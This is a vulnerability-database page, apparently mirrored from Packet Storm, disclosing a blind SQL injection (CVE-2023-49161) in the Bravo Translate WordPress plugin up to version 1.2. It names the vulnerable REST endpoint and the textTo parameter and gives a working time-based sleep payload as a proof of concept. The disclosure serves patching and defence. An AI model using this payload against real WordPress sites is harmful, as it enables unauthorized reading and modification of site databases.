Lucene search
ArvandyPACKETSTORM:176137HistoryDec 11, 2023 - 12:00 a.m.
WordPress Bravo Translate 1.2 SQL Injection
2023-12-1100:00:00
Arvandy
packetstormsecurity.com
151
wordpress
bravo translate
sql injection
unauthorized access
data modification
vulnerability
database-based translation
web security
cve-2023-49161
`# Exploit Title: WP Plugins Bravo Translate <= 1.2 - SQL Injection
# Date: 09-12-2023
# Exploit Author: Arvandy
# Software Link: https://wordpress.org/plugins/bravo-translate/
# Version: 1.2
# Tested on: Windows, Linux
# CVE: CVE-2023-49161
# Product Description
This plugin allow you to translate your monolingual website in a super easy manner. You do not have to bother about .pot .po or .mo files. It safes you a lot of time cause you can effectively transalte thouse texts in a foreign language with just a few clicks gaining productivity. Bravo translate keeps your translations in your database. You dont have to worry about themes or plugins updates because your translations will not vannish.
# Vulnerability overview:
The WordPress Plugins Bravo Translate <= 1.2 is vulnerable to Blind SQL Injection via the textTo parameter on /wp-json/bravo-translate/BRAVOTRAN_create endpoint. This vulnerability could lead to unauthorized data access and modification.
# Proof of Concept:
Affected Endpoint: /wp-json/bravo-translate/BRAVOTRAN_create?textTo=a&yourTranslation=b
Affected Parameter: textTo
payload: test',(select%20sleep(5)))%23
# Recommendation
N/A
`
Related
cve
cve
CVE-2023-49161
2023-12-20 18:15:12
prion
prion
Sql injection
2023-12-20 18:15:00
nvd
nvd
CVE-2023-49161
2023-12-20 18:15:12
zdt
zdt
WordPress Bravo Translate 1.2 SQL Injection Vulnerability
2023-12-12 00:00:00
cvelist
cvelist
wpvulndb
wpvulndb
Bravo Translate <= 1.2 - Authenticated (Administrator+) SQL Injection
2023-12-08 00:00:00
wordfence
wordfence